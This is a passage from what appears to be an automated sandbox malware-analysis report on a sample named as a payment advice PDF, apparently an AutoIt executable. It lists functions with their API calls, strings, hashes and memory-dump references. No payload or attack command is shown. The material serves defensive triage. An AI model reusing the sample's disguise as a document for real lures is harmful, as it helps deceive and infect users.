                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 30ddb2b4f79f7d60519ed61cc7b749a6f7adadf20927c562f41657e0aa5ca331
                                                              • Instruction ID: 9b81eeb057c56e9beaf42ab66e84c26481ca6436774a0402754e0afe200e7013
                                                              • Opcode Fuzzy Hash: 30ddb2b4f79f7d60519ed61cc7b749a6f7adadf20927c562f41657e0aa5ca331
                                                              • Instruction Fuzzy Hash: 43B13A71A0460ADFDB14DFA8DC49BAE7BB5FB08314F518229FA15E72A0DB74D840DB60
                                                              Function 0089A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0089A47A
                                                              • __swprintf.LIBCMT ref: 0089A51B
                                                              • _wcscmp.LIBCMT ref: 0089A52E
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0089A583
                                                              • _wcscmp.LIBCMT ref: 0089A5BF
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0089A5F6
                                                              • GetDlgCtrlID.USER32(?), ref: 0089A648
                                                              • GetWindowRect.USER32(?,?), ref: 0089A67E
                                                              • GetParent.USER32(?), ref: 0089A69C
                                                              • ScreenToClient.USER32(00000000), ref: 0089A6A3
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0089A71D
                                                              • _wcscmp.LIBCMT ref: 0089A731
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0089A757
                                                              • _wcscmp.LIBCMT ref: 0089A76B
                                                                • Part of subcall function 0086362C: _iswctype.LIBCMT ref: 00863634
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                              • String ID: %s%u
                                                              • API String ID: 3744389584-679674701
                                                              • Opcode ID: 09cf65fca1d8ed59b9aa45fc2a7595985f4fddd0440899fedb1cc2fb4293600c
                                                              • Instruction ID: 7002ee757481b8238d0d4d9257e4e6421c2c6f1f681ef46e5105b6c51083da4a
                                                              • Opcode Fuzzy Hash: 09cf65fca1d8ed59b9aa45fc2a7595985f4fddd0440899fedb1cc2fb4293600c
                                                              • Instruction Fuzzy Hash: D5A1E031204206BFDB19EFA4C885FAAB7E8FF54314F088529F999D2191DB30E955CBD2
                                                              Function 0089AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0089AF18
                                                              • _wcscmp.LIBCMT ref: 0089AF29
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0089AF51
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0089AF6E
                                                              • _wcscmp.LIBCMT ref: 0089AF8C
                                                              • _wcsstr.LIBCMT ref: 0089AF9D
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0089AFD5
                                                              • _wcscmp.LIBCMT ref: 0089AFE5
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0089B00C
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0089B055
                                                              • _wcscmp.LIBCMT ref: 0089B065
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0089B08D
                                                              • GetWindowRect.USER32(00000004,?), ref: 0089B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: 090389ab8de141a9240ad15bd44d05a13ba598650b29bff26ca512836791feda
                                                              • Instruction ID: 4772e0b9d9a37e138585c4734fa09b5a02f38e21b2c1a9e67e96198e619ffc10
                                                              • Opcode Fuzzy Hash: 090389ab8de141a9240ad15bd44d05a13ba598650b29bff26ca512836791feda
                                                              • Instruction Fuzzy Hash: 39819C711082099FDF04EF14D985FAA7BE8FF54714F08846AED85CA092DB34DD49CBA2
                                                              Function 0089ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: f078628aea4ce313ff356ab65f66e23c4000a2a7f9b4457a309beaeca4d6735e
                                                              • Instruction ID: 901790b9a0d86f89875f403e6acdae7bdd03ce72d14eda1805e4b48571c95255
                                                              • Opcode Fuzzy Hash: f078628aea4ce313ff356ab65f66e23c4000a2a7f9b4457a309beaeca4d6735e
                                                              • Instruction Fuzzy Hash: F431B030A4821DABEB08FA68DD43EBE77A4FB10714F250428F512F51D2EB656F148693
                                                              Function 008B4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 008B5013
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 008B501E
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 008B5029
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 008B5034
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 008B503F
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 008B504A
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 008B5055
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 008B5060
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 008B506B
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 008B5076
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 008B5081
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 008B508C
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 008B5097
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 008B50A2
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 008B50AD
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 008B50B8
                                                              • GetCursorInfo.USER32(?), ref: 008B50C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: d901ac9278472577478a80d1525bc09d4990601e377393a2e75db36474de0b0e
                                                              • Instruction ID: 371b909d2e0cfaefdbd25ae71a9263e5f333799a2a1c254d1ef93abbdb59390a
                                                              • Opcode Fuzzy Hash: d901ac9278472577478a80d1525bc09d4990601e377393a2e75db36474de0b0e
                                                              • Instruction Fuzzy Hash: E231E1B1D4871D6ADB109FBA8C899AFBFE8FF04750F50453AE50DE7280DA78A5018E91
                                                              Function 008CA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008CA259
                                                              • DestroyWindow.USER32(?,?), ref: 008CA2D3
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008CA34D
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008CA36F
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008CA382
                                                              • DestroyWindow.USER32(00000000), ref: 008CA3A4
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00840000,00000000), ref: 008CA3DB
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008CA3F4
                                                              • GetDesktopWindow.USER32 ref: 008CA40D
                                                              • GetWindowRect.USER32(00000000), ref: 008CA414
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008CA42C
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008CA444
                                                                • Part of subcall function 008425DB: GetWindowLongW.USER32(?,000000EB), ref: 008425EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 1297703922-3619404913
                                                              • Opcode ID: fe376bc52f7ac4010d2e3e0ae9b3a90a6673c65892805425a1a1b5ee87c88935
                                                              • Instruction ID: e2bb6f4239564b65a38337473bfa4c2a26301919eaa8ed1bc3b63c7603e41202
                                                              • Opcode Fuzzy Hash: fe376bc52f7ac4010d2e3e0ae9b3a90a6673c65892805425a1a1b5ee87c88935
                                                              • Instruction Fuzzy Hash: B9716770144248AFEB29CF28C849F6A7BF6FB88708F04452CF985C72A1D774E906DB56
                                                              Function 008CC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DragQueryPoint.SHELL32(?,?), ref: 008CC627
                                                                • Part of subcall function 008CAB37: ClientToScreen.USER32(?,?), ref: 008CAB60
                                                                • Part of subcall function 008CAB37: GetWindowRect.USER32(?,?), ref: 008CABD6
                                                                • Part of subcall function 008CAB37: PtInRect.USER32(?,?,008CC014), ref: 008CABE6
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008CC690
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008CC69B
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008CC6BE
                                                              • _wcscat.LIBCMT ref: 008CC6EE
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 008CC705
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008CC71E
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 008CC735
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 008CC757
                                                              • DragFinish.SHELL32(?), ref: 008CC75E
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008CC851
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: d326904618409e73b38c2971e90c45f319e3dc8321f5fd36452bf448e8c20f67
                                                              • Instruction ID: 95cf00828c119febf598915f9c4cae9591cf47c0bcf492af3f46ab60ca122d7a
                                                              • Opcode Fuzzy Hash: d326904618409e73b38c2971e90c45f319e3dc8321f5fd36452bf448e8c20f67
                                                              • Instruction Fuzzy Hash: 16613A71108304AFD701EF68D885EAFBBF9FB99710F00092EF695D62A1DB709949CB52
                                                              Function 008C4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 008C4424
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008C446F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 51beca676d89fe3421a60d8042e7422a61ad2b52f0da7601ca97b76e3b1e1c63
                                                              • Instruction ID: f140d5ccc56e6fdec82f3784c33ab41d33832bb4c3291316caffaf74c322cdde
                                                              • Opcode Fuzzy Hash: 51beca676d89fe3421a60d8042e7422a61ad2b52f0da7601ca97b76e3b1e1c63
                                                              • Instruction Fuzzy Hash: 819169302003159BCB14EF28C461E6EB7A1FF95354F15886DE8D69B3A2DB31ED49CB82
                                                              Function 008CB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008CB8B4
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008C91C2), ref: 008CB910
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008CB949
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008CB98C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008CB9C3
                                                              • FreeLibrary.KERNEL32(?), ref: 008CB9CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008CB9DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,008C91C2), ref: 008CB9EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008CBA0B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008CBA17
                                                                • Part of subcall function 00862EFD: __wcsicmp_l.LIBCMT ref: 00862F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 7029ecc39d9b036d35e9e3b6f57921b8e9bbcac8cb5d9fec2b0909e1855cf1c4
                                                              • Instruction ID: 874d43f14cbcf85900e1516ff7cfa563f55f6dafefc21f14b48e3ee5c0bd8e28
                                                              • Opcode Fuzzy Hash: 7029ecc39d9b036d35e9e3b6f57921b8e9bbcac8cb5d9fec2b0909e1855cf1c4
                                                              • Instruction Fuzzy Hash: 0E61CF71900A19BAEB14DF68DC42FBA7BB8FB08720F10411AFA15D61D1EB74D994DBA0
                                                              Function 008ADC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 008ADCDC
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 008ADCEC
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008ADCF8
                                                              • __wsplitpath.LIBCMT ref: 008ADD56
                                                              • _wcscat.LIBCMT ref: 008ADD6E
                                                              • _wcscat.LIBCMT ref: 008ADD80
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008ADD95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADDA9
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADDDB
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADDFC
                                                              • _wcscpy.LIBCMT ref: 008ADE08
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008ADE47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: 45d08252237f9a2bc4cf4cae9394c545f2cedfa9e45e0b0f65c40dc50eab8107
                                                              • Instruction ID: b70f63a4869e810d460132159c49c0012fe1bd6dcc3fa4fdc08724351b038310
                                                              • Opcode Fuzzy Hash: 45d08252237f9a2bc4cf4cae9394c545f2cedfa9e45e0b0f65c40dc50eab8107
                                                              • Instruction Fuzzy Hash: 3A615B725043099FDB20EF64C8449AEB3E8FF89324F04492EF98AC7651EB75E945CB52
                                                              Function 008A9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 008A9C7F
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008A9CA0
                                                              • __swprintf.LIBCMT ref: 008A9CF9
                                                              • __swprintf.LIBCMT ref: 008A9D12
                                                              • _wprintf.LIBCMT ref: 008A9DB9
                                                              • _wprintf.LIBCMT ref: 008A9DD7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 311963372-3080491070
                                                              • Opcode ID: 952c2e8d22c1b21b48825e556060cd8872b1efd8971f15bcf94d3d140ed2542e
                                                              • Instruction ID: 23370746145a9574a31b3656ebd856a448ee3852d08a1b2382f096656af28d2e
                                                              • Opcode Fuzzy Hash: 952c2e8d22c1b21b48825e556060cd8872b1efd8971f15bcf94d3d140ed2542e
                                                              • Instruction Fuzzy Hash: 3D516F3190460DAADF14EBA8DD86EEEBB78FF14300F500065F515F21A2EB352E99DB52
                                                              Function 008AA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • CharLowerBuffW.USER32(?,?), ref: 008AA3CB
                                                              • GetDriveTypeW.KERNEL32 ref: 008AA418
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008AA460
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008AA497
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008AA4C5
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 2698844021-4113822522
                                                              • Opcode ID: ca6acc401aac23d76baa9abd6a4abe99b5c1fc704a0c95a2cf0897968e639199
                                                              • Instruction ID: 19f828ba9d58121aaba890922b6e349289e9577f97d848b49aa2c93f6686ae21
                                                              • Opcode Fuzzy Hash: ca6acc401aac23d76baa9abd6a4abe99b5c1fc704a0c95a2cf0897968e639199
                                                              • Instruction Fuzzy Hash: 565149711043099FD704EF28C88196EB7E4FF99758F00886DF89AD7662DB71AD09CB52
                                                              Function 0089F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0087E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0089F8DF
                                                              • LoadStringW.USER32(00000000,?,0087E029,00000001), ref: 0089F8E8
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • GetModuleHandleW.KERNEL32(00000000,00905310,?,00000FFF,?,?,0087E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0089F90A
                                                              • LoadStringW.USER32(00000000,?,0087E029,00000001), ref: 0089F90D
                                                              • __swprintf.LIBCMT ref: 0089F95D
                                                              • __swprintf.LIBCMT ref: 0089F96E
                                                              • _wprintf.LIBCMT ref: 0089FA17
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0089FA2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
